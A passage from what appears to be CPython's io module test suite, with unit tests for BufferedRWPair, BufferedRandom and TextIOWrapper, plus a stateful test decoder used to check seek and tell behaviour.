pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertEqual(pair.read1(3), b"abc")
def test_readinto(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
data = byteslike(5)
self.assertEqual(pair.readinto(data), 5)
self.assertEqual(data.tobytes(), b"abcde")
def test_write(self):
w = self.MockRawIO()
pair = self.tp(self.MockRawIO(), w)
pair.write(b"abc")
pair.flush()
buffer = bytearray(b"def")
pair.write(buffer)
buffer[:] = b"***" # Overwrite our copy of the data
pair.flush()
self.assertEqual(w._write_stack, [b"abc", b"def"])
def test_peek(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertTrue(pair.peek(3).startswith(b"abc"))
self.assertEqual(pair.read(3), b"abc")
def test_readable(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertTrue(pair.readable())
def test_writeable(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertTrue(pair.writable())
def test_seekable(self):
# BufferedRWPairs are never seekable, even if their readers and writers
# are.
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.seekable())
# .flush() is delegated to the underlying writer object and has been
# tested in the test_write method.
def test_close_and_closed(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.closed)
pair.close()
self.assertTrue(pair.closed)
def test_reader_close_error_on_close(self):
def reader_close():
reader_non_existing
reader = self.MockRawIO()
reader.close = reader_close
writer = self.MockRawIO()
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('reader_non_existing', str(err.exception))
self.assertTrue(pair.closed)
self.assertFalse(reader.closed)
self.assertTrue(writer.closed)
def test_writer_close_error_on_close(self):
def writer_close():
writer_non_existing
reader = self.MockRawIO()
writer = self.MockRawIO()
writer.close = writer_close
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('writer_non_existing', str(err.exception))
self.assertFalse(pair.closed)
self.assertTrue(reader.closed)
self.assertFalse(writer.closed)
def test_reader_writer_close_error_on_close(self):
def reader_close():
reader_non_existing
def writer_close():
writer_non_existing
reader = self.MockRawIO()
reader.close = reader_close
writer = self.MockRawIO()
writer.close = writer_close
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('reader_non_existing', str(err.exception))
self.assertFalse(pair.closed)
self.assertFalse(reader.closed)
self.assertFalse(writer.closed)
def test_isatty(self):
class SelectableIsAtty(MockRawIO):
def __init__(self, isatty):
MockRawIO.__init__(self)
self._isatty = isatty
def isatty(self):
return self._isatty
pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(False))
self.assertFalse(pair.isatty())
pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(False))
self.assertTrue(pair.isatty())
pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(True))
self.assertTrue(pair.isatty())
pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(True))
self.assertTrue(pair.isatty())
def test_weakref_clearing(self):
brw = self.tp(self.MockRawIO(), self.MockRawIO())
ref = weakref.ref(brw)
brw = None
ref = None # Shouldn't segfault.
class CBufferedRWPairTest(BufferedRWPairTest):
tp = io.BufferedRWPair
class PyBufferedRWPairTest(BufferedRWPairTest):
tp = pyio.BufferedRWPair
class BufferedRandomTest(BufferedReaderTest, BufferedWriterTest):
read_mode = "rb+"
write_mode = "wb+"
def test_constructor(self):
BufferedReaderTest.test_constructor(self)
BufferedWriterTest.test_constructor(self)
def test_uninitialized(self):
BufferedReaderTest.test_uninitialized(self)
BufferedWriterTest.test_uninitialized(self)
def test_read_and_write(self):
raw = self.MockRawIO((b"asdf", b"ghjk"))
rw = self.tp(raw, 8)
self.assertEqual(b"as", rw.read(2))
rw.write(b"ddd")
rw.write(b"eee")
self.assertFalse(raw._write_stack) # Buffer writes
self.assertEqual(b"ghjk", rw.read())
self.assertEqual(b"dddeee", raw._write_stack[0])
def test_seek_and_tell(self):
raw = self.BytesIO(b"asdfghjkl")
rw = self.tp(raw)
self.assertEqual(b"as", rw.read(2))
self.assertEqual(2, rw.tell())
rw.seek(0, 0)
self.assertEqual(b"asdf", rw.read(4))
rw.write(b"123f")
rw.seek(0, 0)
self.assertEqual(b"asdf123fl", rw.read())
self.assertEqual(9, rw.tell())
rw.seek(-4, 2)
self.assertEqual(5, rw.tell())
rw.seek(2, 1)
self.assertEqual(7, rw.tell())
self.assertEqual(b"fl", rw.read(11))
rw.flush()
self.assertEqual(b"asdf123fl", raw.getvalue())
self.assertRaises(TypeError, rw.seek, 0.0)
def check_flush_and_read(self, read_func):
raw = self.BytesIO(b"abcdefghi")
bufio = self.tp(raw)
self.assertEqual(b"ab", read_func(bufio, 2))
bufio.write(b"12")
self.assertEqual(b"ef", read_func(bufio, 2))
self.assertEqual(6, bufio.tell())
bufio.flush()
self.assertEqual(6, bufio.tell())
self.assertEqual(b"ghi", read_func(bufio))
raw.seek(0, 0)
raw.write(b"XYZ")
# flush() resets the read buffer
bufio.flush()
bufio.seek(0, 0)
self.assertEqual(b"XYZ", read_func(bufio, 3))
def test_flush_and_read(self):
self.check_flush_and_read(lambda bufio, *args: bufio.read(*args))
def test_flush_and_readinto(self):
def _readinto(bufio, n=-1):
b = bytearray(n if n >= 0 else 9999)
n = bufio.readinto(b)
return bytes(b[:n])
self.check_flush_and_read(_readinto)
def test_flush_and_peek(self):
def _peek(bufio, n=-1):
# This relies on the fact that the buffer can contain the whole
# raw stream, otherwise peek() can return less.
b = bufio.peek(n)
if n != -1:
b = b[:n]
bufio.seek(len(b), 1)
return b
self.check_flush_and_read(_peek)
def test_flush_and_write(self):
raw = self.BytesIO(b"abcdefghi")
bufio = self.tp(raw)
bufio.write(b"123")
bufio.flush()
bufio.write(b"45")
bufio.flush()
bufio.seek(0, 0)
self.assertEqual(b"12345fghi", raw.getvalue())
self.assertEqual(b"12345fghi", bufio.read())
def test_threads(self):
BufferedReaderTest.test_threads(self)
BufferedWriterTest.test_threads(self)
def test_writes_and_peek(self):
def _peek(bufio):
bufio.peek(1)
self.check_writes(_peek)
def _peek(bufio):
pos = bufio.tell()
bufio.seek(-1, 1)
bufio.peek(1)
bufio.seek(pos, 0)
self.check_writes(_peek)
def test_writes_and_reads(self):
def _read(bufio):
bufio.seek(-1, 1)
bufio.read(1)
self.check_writes(_read)
def test_writes_and_read1s(self):
def _read1(bufio):
bufio.seek(-1, 1)
bufio.read1(1)
self.check_writes(_read1)
def test_writes_and_readintos(self):
def _read(bufio):
bufio.seek(-1, 1)
bufio.readinto(bytearray(1))
self.check_writes(_read)
def test_write_after_readahead(self):
# Issue #6629: writing after the buffer was filled by readahead should
# first rewind the raw stream.
for overwrite_size in [1, 5]:
raw = self.BytesIO(b"A" * 10)
bufio = self.tp(raw, 4)
# Trigger readahead
self.assertEqual(bufio.read(1), b"A")
self.assertEqual(bufio.tell(), 1)
            # Overwriting should rewind the raw stream if needed
bufio.write(b"B" * overwrite_size)
self.assertEqual(bufio.tell(), overwrite_size + 1)
# If the write size was smaller than the buffer size, flush() and
# check that rewind happens.
bufio.flush()
self.assertEqual(bufio.tell(), overwrite_size + 1)
s = raw.getvalue()
self.assertEqual(s,
b"A" + b"B" * overwrite_size + b"A" * (9 - overwrite_size))
def test_write_rewind_write(self):
# Various combinations of reading / writing / seeking backwards / writing again
def mutate(bufio, pos1, pos2):
assert pos2 >= pos1
# Fill the buffer
bufio.seek(pos1)
bufio.read(pos2 - pos1)
bufio.write(b'\x02')
# This writes earlier than the previous write, but still inside
# the buffer.
bufio.seek(pos1)
bufio.write(b'\x01')
b = b"\x80\x81\x82\x83\x84"
for i in range(0, len(b)):
for j in range(i, len(b)):
raw = self.BytesIO(b)
bufio = self.tp(raw, 100)
mutate(bufio, i, j)
bufio.flush()
expected = bytearray(b)
expected[j] = 2
expected[i] = 1
self.assertEqual(raw.getvalue(), expected,
"failed result for i=%d, j=%d" % (i, j))
def test_truncate_after_read_or_write(self):
raw = self.BytesIO(b"A" * 10)
bufio = self.tp(raw, 100)
self.assertEqual(bufio.read(2), b"AA") # the read buffer gets filled
self.assertEqual(bufio.truncate(), 2)
self.assertEqual(bufio.write(b"BB"), 2) # the write buffer increases
self.assertEqual(bufio.truncate(), 4)
def test_misbehaved_io(self):
BufferedReaderTest.test_misbehaved_io(self)
BufferedWriterTest.test_misbehaved_io(self)
def test_interleaved_read_write(self):
# Test for issue #12213
with self.BytesIO(b'abcdefgh') as raw:
with self.tp(raw, 100) as f:
f.write(b"1")
self.assertEqual(f.read(1), b'b')
f.write(b'2')
self.assertEqual(f.read1(1), b'd')
f.write(b'3')
buf = bytearray(1)
f.readinto(buf)
self.assertEqual(buf, b'f')
f.write(b'4')
self.assertEqual(f.peek(1), b'h')
f.flush()
self.assertEqual(raw.getvalue(), b'1b2d3f4h')
with self.BytesIO(b'abc') as raw:
with self.tp(raw, 100) as f:
self.assertEqual(f.read(1), b'a')
f.write(b"2")
self.assertEqual(f.read(1), b'c')
f.flush()
self.assertEqual(raw.getvalue(), b'a2c')
def test_interleaved_readline_write(self):
with self.BytesIO(b'ab\ncdef\ng\n') as raw:
with self.tp(raw) as f:
f.write(b'1')
self.assertEqual(f.readline(), b'b\n')
f.write(b'2')
self.assertEqual(f.readline(), b'def\n')
f.write(b'3')
self.assertEqual(f.readline(), b'\n')
f.flush()
self.assertEqual(raw.getvalue(), b'1b\n2def\n3\n')
class CBufferedRandomTest(CBufferedReaderTest, CBufferedWriterTest,
BufferedRandomTest, SizeofTest):
tp = io.BufferedRandom
def test_constructor(self):
BufferedRandomTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2GB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_garbage_collection(self):
CBufferedReaderTest.test_garbage_collection(self)
CBufferedWriterTest.test_garbage_collection(self)
@support.impl_detail(cpython=True)
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegexp(TypeError, "BufferedRandom"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedRandomTest(BufferedRandomTest):
tp = pyio.BufferedRandom
# To fully exercise seek/tell, the StatefulIncrementalDecoder has these
# properties:
# - A single output character can correspond to many bytes of input.
# - The number of input bytes to complete the character can be
# undetermined until the last input byte is received.
# - The number of input bytes can vary depending on previous input.
# - A single input byte can correspond to many characters of output.
# - The number of output characters can be undetermined until the
# last input byte is received.
# - The number of output characters can vary depending on previous input.
class StatefulIncrementalDecoder(codecs.IncrementalDecoder):
"""
For testing seek/tell behavior with a stateful, buffering decoder.
Input is a sequence of words. Words may be fixed-length (length set
by input) or variable-length (period-terminated). In variable-length
mode, extra periods are ignored. Possible words are:
- 'i' followed by a number sets the input length, I (maximum 99).
        When I is set to 0, words are period-terminated.
- 'o' followed by a number sets the output length, O (maximum 99).
- Any other word is converted into a word followed by a period on
the output. The output word consists of the input word truncated
or padded out with hyphens to make its length equal to O. If O
is 0, the word is output verbatim without truncating or padding.
I and O are initially set to 1. When I changes, any buffered input is
re-scanned according to the new I. EOF also terminates the last word.
"""
def __init__(self, errors='strict'):
codecs.IncrementalDecoder.__init__(self, errors)
self.reset()
def __repr__(self):
return '<SID %x>' % id(self)
def reset(self):
self.i = 1
self.o = 1
self.buffer = bytearray()
def getstate(self):
i, o = self.i ^ 1, self.o ^ 1 # so that flags = 0 after reset()
return bytes(self.buffer), i*100 + o
def setstate(self, state):
buffer, io = state
self.buffer = bytearray(buffer)
i, o = divmod(io, 100)
self.i, self.o = i ^ 1, o ^ 1
def decode(self, input, final=False):
output = ''
for b in input:
if self.i == 0: # variable-length, terminated with period
if b == '.':
if self.buffer:
output += self.process_word()
else:
self.buffer.append(b)
else: # fixed-length, terminate after self.i bytes
self.buffer.append(b)
if len(self.buffer) == self.i:
output += self.process_word()
if final and self.buffer: # EOF terminates the last word
output += self.process_word()
return output
def process_word(self):
output = ''
if self.buffer[0] == ord('i'):
self.i = min(99, int(self.buffer[1:] or 0)) # set input length
elif self.buffer[0] == ord('o'):
self.o = min(99, int(self.buffer[1:] or 0)) # set output length
else:
output = self.buffer.decode('ascii')
if len(output) < self.o:
output += '-'*self.o # pad out with hyphens
if self.o:
output = output[:self.o] # truncate to output length
output += '.'
self.buffer = bytearray()
return output
codecEnabled = False
@classmethod
def lookupTestDecoder(cls, name):
if cls.codecEnabled and name == 'test_decoder':
latin1 = codecs.lookup('latin-1')
return codecs.CodecInfo(
name='test_decoder', encode=latin1.encode, decode=None,
incrementalencoder=None,
streamreader=None, streamwriter=None,
incrementaldecoder=cls)
# Register the previous decoder for testing.
# Disabled by default, tests will enable it.
codecs.register(StatefulIncrementalDecoder.lookupTestDecoder)
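# Illustrative sketch (not part of the original test suite): driving the decoder
# by hand shows how the control words adjust I and O before any text is emitted.
# The expected values below match the (b'i.i2.o6xyz', True, 'xy----.z-----.')
# test case further down.
def _demo_stateful_decoder():
    d = StatefulIncrementalDecoder()
    assert d.decode(b'i.i2.o6') == ''               # control words produce no output
    assert d.decode(b'xyz', final=True) == 'xy----.z-----.'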
class StatefulIncrementalDecoderTest(unittest.TestCase):
"""
Make sure the StatefulIncrementalDecoder actually works.
"""
test_cases = [
# I=1, O=1 (fixed-length input == fixed-length output)
(b'abcd', False, 'a.b.c.d.'),
# I=0, O=0 (variable-length input, variable-length output)
(b'oiabcd', True, 'abcd.'),
# I=0, O=0 (should ignore extra periods)
(b'oi...abcd...', True, 'abcd.'),
# I=0, O=6 (variable-length input, fixed-length output)
(b'i.o6.x.xyz.toolongtofit.', False, 'x-----.xyz---.toolon.'),
# I=2, O=6 (fixed-length input < fixed-length output)
(b'i.i2.o6xyz', True, 'xy----.z-----.'),
# I=6, O=3 (fixed-length input > fixed-length output)
(b'i.o3.i6.abcdefghijklmnop', True, 'abc.ghi.mno.'),
# I=0, then 3; O=29, then 15 (with longer output)
(b'i.o29.a.b.cde.o15.abcdefghijabcdefghij.i3.a.b.c.d.ei00k.l.m', True,
'a----------------------------.' +
'b----------------------------.' +
'cde--------------------------.' +
'abcdefghijabcde.' +
'a.b------------.' +
'.c.------------.' +
'd.e------------.' +
'k--------------.' +
'l--------------.' +
'm--------------.')
]
def test_decoder(self):
# Try a few one-shot test cases.
for input, eof, output in self.test_cases:
d = StatefulIncrementalDecoder()
self.assertEqual(d.decode(input, eof), output)
# Also test an unfinished decode, followed by forcing EOF.
d = StatefulIncrementalDecoder()
self.assertEqual(d.decode(b'oiabcd'), '')
self.assertEqual(d.decode(b'', 1), 'abcd.')
class TextIOWrapperTest(unittest.TestCase):
def setUp(self):
self.testdata = b"AAA\r\nBBB\rCCC\r\nDDD\nEEE\r\n"
self.normalized = b"AAA\nBBB\nCCC\nDDD\nEEE\n".decode("ascii")
support.unlink(support.TESTFN)
def tearDown(self):
support.unlink(support.TESTFN)
def test_constructor(self):
r = self.BytesIO(b"\xc3\xa9\n\n")
b = self.BufferedReader(r, 1000)
t = self.TextIOWrapper(b)
t.__init__(b, encoding="latin1", newline="\r\n")
self.assertEqual(t.encoding, "latin1")
self.assertEqual(t.line_buffering, False)
t.__init__(b, encoding="utf8", line_buffering=True)
self.assertEqual(t.encoding, "utf8")
self.assertEqual(t.line_buffering, True)
self.assertEqual("\xe9\n", t.readline())
self.assertRaises(TypeError, t.__init__, b, newline=42)
self.assertRaises(ValueError, t.__init__, b, newline='xyzzy')
def test_uninitialized(self):
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
del t
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
self.assertRaises(Exception, repr, t)
self.assertRaisesRegexp((ValueError, AttributeError),
'uninitialized|has no attribute',
t.read, 0)
t.__init__(self.MockRawIO())
self.assertEqual(t.read(0), u'')
def test_non_text_encoding_codecs_are_rejected(self):
# Ensure the constructor complains if passed a codec that isn't
# marked as a text encoding
# http://bugs.python.org/issue20404
r = self.BytesIO()
b = self.BufferedWriter(r)
with support.check_py3k_warnings():
self.TextIOWrapper(b, encoding="hex_codec")
def test_detach(self):
r = self.BytesIO()
b = self.BufferedWriter(r)
t = self.TextIOWrapper(b)
self.assertIs(t.detach(), b)
t = self.TextIOWrapper(b, encoding="ascii")
t.write("howdy")
self.assertFalse(r.getvalue())
t.detach()
self.assertEqual(r.getvalue(), b"howdy")
self.assertRaises(ValueError, t.detach)
# Operations independent of the detached stream should still work
repr(t)
self.assertEqual(t.encoding, "ascii")
self.assertEqual(t.errors, "strict")
self.assertFalse(t.line_buffering)
def test_repr(self):
raw = self.BytesIO("hello".encode("utf-8"))
b = self.BufferedReader(raw)
t = self.TextIOWrapper(b, encoding="utf-8")
modname = self.TextIOWrapper.__module__
self.assertEqual(repr(t),
"<%s.TextIOWrapper encoding='utf-8'>" % modname)
raw.name = "dummy"
self.assertEqual(repr(t),
"<%s.TextIOWrapper name=u'dummy' encoding='utf-8'>" % modname)
raw.name = b"dummy"
self.assertEqual(repr(t),
"<%s.TextIOWrapper name='dummy' encoding='utf-8'>" % modname)
t.buffer.detach()
repr(t) # Should not raise an exception
def test_line_buffering(self):
r = self.BytesIO()
b = self.BufferedWriter(r, 1000)
t = self.TextIOWrapper(b, newline="\n", line_buffering=True)
t.write("X")
self.assertEqual(r.getvalue(), b"") # No flush happened
t.write("Y\nZ")
self.assertEqual(r.getvalue(), b"XY\nZ") # All got flushed
t.write("A\rB")
self.assertEqual(r.getvalue(), b"XY\nZA\rB")
def test_encoding(self):
# Check the encoding attribute is always set, and valid
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="utf8")
self.assertEqual(t.encoding, "utf8")
t = self.TextIOWrapper(b)
self.assertIsNotNone(t.encoding)
codecs.lookup(t.encoding)
def test_encoding_errors_reading(self):
# (1) default
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii")
self.assertRaises(UnicodeError, t.read)
# (2) explicit strict
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="strict")
self.assertRaises(UnicodeError, t.read)
# (3) ignore
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="ignore")
self.assertEqual(t.read(), "abc\n\n")
# (4) replace
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="replace")
self.assertEqual(t.read(), "abc\n\ufffd\n")
def test_encoding_errors_writing(self):
# (1) default
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii")
self.assertRaises(UnicodeError, t.write, "\xff")
# (2) explicit strict
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="strict")
self.assertRaises(UnicodeError, t.write, "\xff")
# (3) ignore
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="ignore",
newline="\n")
t.write("abc\xffdef\n")
t.flush()
self.assertEqual(b.getvalue(), b"abcdef\n")
# (4) replace
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="replace",
newline="\n")
t.write("abc\xffdef\n")
t.flush()
self.assertEqual(b.getvalue(), b"abc?def\n")
def test_newlines(self):
input_lines = [ "unix\n", "windows\r\n", "os9\r", "last\n", "nonl" ]
tests = [
[ None, [ 'unix\n', 'windows\n', 'os9\n', 'last\n', 'nonl' ] ],
[ '', input_lines ],
[ '\n', [ "unix\n", "windows\r\n", "os9\rlast\n", "nonl" ] ],
[ '\r\n', [ "unix\nwindows\r\n", "os9\rlast\nnonl" ] ],
[ '\r', [ "unix\nwindows\r", "\nos9\r", "last\nnonl" ] ],
]
encodings = (
'utf-8', 'latin-1',
'utf-16', 'utf-16-le', 'utf-16-be',
'utf-32', 'utf-32-le', 'utf-32-be',
)
# Try a range of buffer sizes to test the case where \r is the last
# character in TextIOWrapper._pending_line.
for encoding in encodings:
# XXX: str.encode() should return bytes
data = bytes(''.join(input_lines).encode(encoding))
for do_reads in (False, True):
for bufsize in range(1, 10):
for newline, exp_lines in tests:
bufio = self.BufferedReader(self.BytesIO(data), bufsize)
textio = self.TextIOWrapper(bufio, newline=newline,
encoding=encoding)
if do_reads:
got_lines = []
while True:
c2 = textio.read(2)
if c2 == '':
break
self.assertEqual(len(c2), 2)
got_lines.append(c2 + textio.readline())
else:
got_lines = list(textio)
for got_line, exp_line in zip(got_lines, exp_lines):
self.assertEqual(got_line, exp_line)
self.assertEqual(len(got_lines), len(exp_lines))
def test_newlines_input(self):
testdata = b"AAA\nBB\x00B\nCCC\rDDD\rEEE\r\nFFF\r\nGGG"
normalized = testdata.replace(b"\r\n", b"\n").replace(b"\r", b"\n")
for newline, expected in [
(None, normalized.decode("ascii").splitlines(True)),
("", testdata.decode("ascii").splitlines(True)),
("\n", ["AAA\n", "BB\x00B\n", "CCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]),
("\r\n", ["AAA\nBB\x00B\nCCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]),
("\r", ["AAA\nBB\x00B\nCCC\r", "DDD\r", "EEE\r", "\nFFF\r", "\nGGG"]),
]:
buf = self.BytesIO(testdata)
txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline)
self.assertEqual(txt.readlines(), expected)
txt.seek(0)
self.assertEqual(txt.read(), "".join(expected))
def test_newlines_output(self):
testdict = {
"": b"AAA\nBBB\nCCC\nX\rY\r\nZ",
"\n": b"AAA\nBBB\nCCC\nX\rY\r\nZ",
"\r": b"AAA\rBBB\rCCC\rX\rY\r\rZ",
"\r\n": b"AAA\r\nBBB\r\nCCC\r\nX\rY\r\r\nZ",
}
tests = [(None, testdict[os.linesep])] + sorted(testdict.items())
for newline, expected in tests:
buf = self.BytesIO()
txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline)
txt.write("AAA\nB")
txt.write("BB\nCCC\n")
txt.write("X\rY\r\nZ")
txt.flush()
self.assertEqual(buf.closed, False)
self.assertEqual(buf.getvalue(), expected)
def test_destructor(self):
l = []
base = self.BytesIO
class MyBytesIO(base):
def close(self):
l.append(self.getvalue())
base.close(self)
b = MyBytesIO()
t = self.TextIOWrapper(b, encoding="ascii")
t.write("abc")
del t
support.gc_collect()
self.assertEqual([b"abc"], l)
def test_override_destructor(self):
record = []
class MyTextIO(self.TextIOWrapper):
def __del__(self):
record.append(1)
try:
f = super(MyTextIO, self).__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super(MyTextIO, self).close()
def flush(self):
record.append(3)
super(MyTextIO, self).flush()
b = self.BytesIO()
t = MyTextIO(b, encoding="ascii")
del t
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_error_through_destructor(self):
# Test that the exception state is not modified by a destructor,
# even if close() fails.
rawio = self.CloseFailureIO()
def f():
self.TextIOWrapper(rawio).xyzzy
with support.captured_output("stderr") as s:
self.assertRaises(AttributeError, f)
s = s.getvalue().strip()
if s:
# The destructor *may* have printed an unraisable error, check it
self.assertEqual(len(s.splitlines()), 1)
self.assertTrue(s.startswith("Exception IOError: "), s)
self.assertTrue(s.endswith(" ignored"), s)
# Systematic tests of the text I/O API
def test_basic_io(self):
for chunksize in (1, 2, 3, 4, 5, 15, 16, 17, 31, 32, 33, 63, 64, 65):
            for enc in "ascii", "latin1", "utf8":  # , "utf-16-be", "utf-16-le"
f = self.open(support.TESTFN, "w+", encoding=enc)
f._CHUNK_SIZE = chunksize
self.assertEqual(f.write("abc"), 3)
f.close()
f = self.open(support.TESTFN, "r+", encoding=enc)
f._CHUNK_SIZE = chunksize
self.assertEqual(f.tell(), 0)
self.assertEqual(f.read(), "abc")
cookie = f.tell()
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.read(None), "abc")
f.seek(0)
self.assertEqual(f.read(2), "ab")
self.assertEqual(f.read(1), "c")
self.assertEqual(f.read(1), "")
self.assertEqual(f.read(), "")
self.assertEqual(f.tell(), cookie)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.seek(0, 2), cookie)
self.assertEqual(f.write("def"), 3)
self.assertEqual(f.seek(cookie), cookie)
self.assertEqual(f.read(), "def")
if enc.startswith("utf"):
self.multi_line_test(f, enc)
f.close()
def multi_line_test(self, f, enc):
f.seek(0)
f.truncate()
sample = "s\xff\u0fff\uffff"
wlines = []
for size in (0, 1, 2, 3, 4, 5, 30, 31, 32, 33, 62, 63, 64, 65, 1000):
chars = []
for i in range(size):
chars.append(sample[i % len(sample)])
line = "".join(chars) + "\n"
wlines.append((f.tell(), line))
f.write(line)
f.seek(0)
rlines = []
while True:
pos = f.tell()
line = f.readline()
if not line:
break
rlines.append((pos, line))
self.assertEqual(rlines, wlines)
def test_telling(self):
f = self.open(support.TESTFN, "w+", encoding="utf8")
p0 = f.tell()
f.write("\xff\n")
p1 = f.tell()
f.write("\xff\n")
p2 = f.tell()
f.seek(0)
self.assertEqual(f.tell(), p0)
self.assertEqual(f.readline(), "\xff\n")
self.assertEqual(f.tell(), p1)
self.assertEqual(f.readline(), "\xff\n")
self.assertEqual(f.tell(), p2)
f.seek(0)
for line in f:
self.assertEqual(line, "\xff\n")
self.assertRaises(IOError, f.tell)
self.assertEqual(f.tell(), p2)
f.close()
def test_seeking(self):
chunk_size = _default_chunk_size()
prefix_size = chunk_size - 2
u_prefix = "a" * prefix_size
prefix = bytes(u_prefix.encode("utf-8"))
self.assertEqual(len(u_prefix), len(prefix))
u_suffix = "\u8888\n"
suffix = bytes(u_suffix.encode("utf-8"))
line = prefix + suffix
f = self.open(support.TESTFN, "wb")
f.write(line*2)
f.close()
f = self.open(support.TESTFN, "r", encoding="utf-8")
s = f.read(prefix_size)
self.assertEqual(s, prefix.decode("ascii"))
self.assertEqual(f.tell(), prefix_size)
self.assertEqual(f.readline(), u_suffix)
def test_seeking_too(self):
# Regression test for a specific bug
data = b'\xe0\xbf\xbf\n'
f = self.open(support.TESTFN, "wb")
f.write(data)
f.close()
f = self.open(support.TESTFN, "r", encoding="utf-8")
f._CHUNK_SIZE # Just test that it exists
f._CHUNK_SIZE = 2
f.readline()
f.tell()
def test_seek_and_tell(self):
        # Test seek/tell using the StatefulIncrementalDecoder.
# Make test faster by doing smaller seeks
CHUNK_SIZE = 128
def test_seek_and_tell_with_data(data, min_pos=0):
"""Tell/seek to various points within a data stream and ensure
that the decoded data returned by read() is consistent."""
f = self.open(support.TESTFN, 'wb')
f.write(data)
f.close()
f = self.open(support.TESTFN, encoding='test_decoder')
f._CHUNK_SIZE = CHUNK_SIZE
decoded = f.read()
f.close()
for i in range(min_pos, len(decoded) + 1): # seek positions
for j in [1, 5, len(decoded) - i]: # read lengths
f = self.open(support.TESTFN, encoding='test_decoder')
self.assertEqual(f.read(i), decoded[:i])
cookie = f.tell()
self.assertEqual(f.read(j), decoded[i:i + j])
f.seek(cookie)
self.assertEqual(f.read(), decoded[i:])
f.close()
# Enable the test decoder.
StatefulIncrementalDecoder.codecEnabled = 1
# Run the tests.
try:
# Try each test case.
for input, _, _ in StatefulIncrementalDecoderTest.test_cases:
test_seek_and_tell_with_data(input)
# Position each test case so that it crosses a chunk boundary.
for input, _, _ in StatefulIncrementalDecoderTest.test_cases:
offset = CHUNK_SIZE - len(input)//2
prefix = b'.'*offset
# Don't bother seeking into the prefix (takes too long).
min_pos = offset*2
test_seek_and_tell_with_data(prefix + input, min_pos)
# Ensure our test decoder won't interfere with subsequent tests.
finally:
StatefulIncrementalDecoder.codecEnabled = 0
def test_encoded_writes(self):
data = "1234567890"
tests = ("utf-16",
"utf-16-le",
"utf-16-be",
"utf-32",
"utf-32-le",
"utf-32-be")
for encoding in tests:
buf = self.BytesIO()
f = self.TextIOWrapper(buf, encoding=encoding)
# Check if the BOM is written only once (see issue1753).
f.write(data)
f.write(data)
f.seek(0)
self.assertEqual(f.read(), data * 2)
f.seek(0)
self.assertEqual(f.read(), data * 2)
self.assertEqual(buf.getvalue(), (data * 2).encode(encoding))
def test_unreadable(self):
class UnReadable(self.BytesIO):
def readable(self):
return False
txt = self.TextIOWrapper(UnReadable())
self.assertRaises(IOError, txt.read)
def test_read_one_by_one(self):
txt = self.TextIOWrapper(self.BytesIO(b"AA\r\nBB"))
reads = ""
while True:
c = txt.read(1)
if not c:
break
reads += c
self.assertEqual(reads, "AA\nBB")
def test_readlines(self):
txt = self.TextIOWrapper(self.BytesIO(b"AA\nBB\nCC"))
self.assertEqual(txt.readlines(), ["AA\n", "BB\n", "CC"])
txt.seek(0)
self.assertEqual(txt.readlines(None), ["AA\n", "BB\n", "CC"])
txt.seek(0)
self.assertEqual(txt.readlines(5), ["AA\n", "BB\n"])
# read in amounts equal to TextIOWrapper._CHUNK_SIZE which is 128.
def test_read_by_chunk(self):
# make sure "\r\n" straddles 128 char boundary.
txt = self.TextIOWrapper(self.BytesIO(b"A" * 127 + b"\r\nB"))
reads = ""
while True:
c = txt.read(128)
if not c:
break
reads += c
self.assertEqual(reads, "A"*127+"\nB")
def test_writelines(self):
l = ['ab', 'cd', 'ef']
buf = self.BytesIO()
txt = self.TextIOWrapper(buf)
txt.writelines(l)
txt.flush()
self.assertEqual(buf.getvalue(), b'abcdef')
def test_writelines_userlist(self):
l = UserList(['ab', 'cd', 'ef'])
buf = self.BytesIO()
txt = self.TextIOWrapper(buf)
txt.writelines(l)
txt.flush()
self.assertEqual(buf.getvalue(), b'abcdef')
def test_writelines_error(self):
txt = self.TextIOWrapper(self.BytesIO())
self.assertRaises(TypeError, txt.writelines, [1, 2, 3])
self.assertRaises(TypeError, txt.writelines, None)
self.assertRaises(TypeError, txt.writelines, b'abc')
def test_issue1395_1(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
# read one char at a time
reads = ""
while True:
